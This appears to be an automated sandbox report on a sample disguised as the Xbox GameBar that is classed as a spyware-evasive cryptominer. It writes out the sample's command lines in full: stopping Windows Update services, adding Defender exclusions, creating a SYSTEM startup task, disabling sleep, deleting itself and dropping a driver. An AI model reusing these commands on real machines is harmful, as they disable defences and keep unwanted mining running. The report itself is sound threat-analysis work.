Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#cgwzt#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Process created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lmcqiiob#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GameBar' /tr '''C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GameBar' -User 'System' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\dwm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jotfq41m.3pt.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.spyw.evad.mine.winEXE@80/19@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7444:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8176:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6016:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1840:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7252:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_01
Source: C:\Windows\System32\dwm.exe	Mutant created: \BaseNamedObjects\Global\wjsosmooouyuvnjx

Source: C:\Users\user\Desktop\GameBar.exe

File created: C:\Program Files\WindowsApsss

Jump to behavior

Source: GameBar.exe	String found in binary or memory: id-cmc-addExtensions
Source: GameBar.exe	String found in binary or memory: set-addPolicy

Source: C:\Windows\System32\dwm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\dwm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: GameBar.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: GameBar.exe

Static file information: File size 6132520 > 1048576

Source: C:\Users\user\Desktop\GameBar.exe	Directory created: C:\Program Files\WindowsApsss	Jump to behavior
Source: C:\Users\user\Desktop\GameBar.exe	Directory created: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays	Jump to behavior
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Directory created: C:\Program Files\Google\Libs	Jump to behavior

Source: GameBar.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x3c6600
Source: GameBar.exe	Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x1ff600

Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: GameBar.exe, 00000000.00000002.468386043.00007FF672919000.00000040.00000001.01000000.00000003.sdmp, GameBar.exe, 00000018.00000002.577177484.00007FF6D9AD9000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: GameBar.exe, GameBar.exe, 00000018.00000002.576517441.00007FF6D93CC000.00000004.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: GameBar.exe, 00000000.00000002.468386043.00007FF672919000.00000040.00000001.01000000.00000003.sdmp, GameBar.exe, 00000018.00000002.577177484.00007FF6D9AD9000.00000040.00000001.01000000.00000007.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFBAC3165EB push ecx; ret	13_2_00007FFBAC3165EC
Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EEE35B0 push rsi; ret	46_2_00007FF67EEE35CA
Source: C:\Windows\System32\conhost.exe	Code function: 46_2_00007FF67EEE62CC push rbx; retf	46_2_00007FF67EEE62CE

Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name:
Source: GameBar.exe	Static PE information: section name: .themida
Source: GameBar.exe	Static PE information: section name: .boot
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name:
Source: GameBar.exe.0.dr	Static PE information: section name: .themida
Source: GameBar.exe.0.dr	Static PE information: section name: .boot
Source: drwozmpbokky.tmp.24.dr	Static PE information: section name: _RANDOMX
Source: drwozmpbokky.tmp.24.dr	Static PE information: section name: _TEXT_CN
Source: drwozmpbokky.tmp.24.dr	Static PE information: section name: _TEXT_CN
Source: drwozmpbokky.tmp.24.dr	Static PE information: section name: _RDATA

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: initial sample	Static PE information: section name: entropy: 7.970397766050055
Source: initial sample	Static PE information: section name: entropy: 7.970397766050055

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Jump to behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	File created: C:\Windows\Temp\drwozmpbokky.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\GameBar.exe	File created: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Jump to dropped file
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe

File created: C:\Windows\Temp\drwozmpbokky.tmp

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: unknown	Process created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe"
Source: C:\Users\user\Desktop\GameBar.exe	Process created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\GameBar.exe"			Jump to behavior

Found hidden mapped module (file has been removed from disk)

Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Module Loaded: C:\WINDOWS\TEMP\DRWOZMPBOKKY.TMP
Source: C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe	Module Loaded: C:\WINDOWS\TEMP\DRWOZMPBOKKY.TMP

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
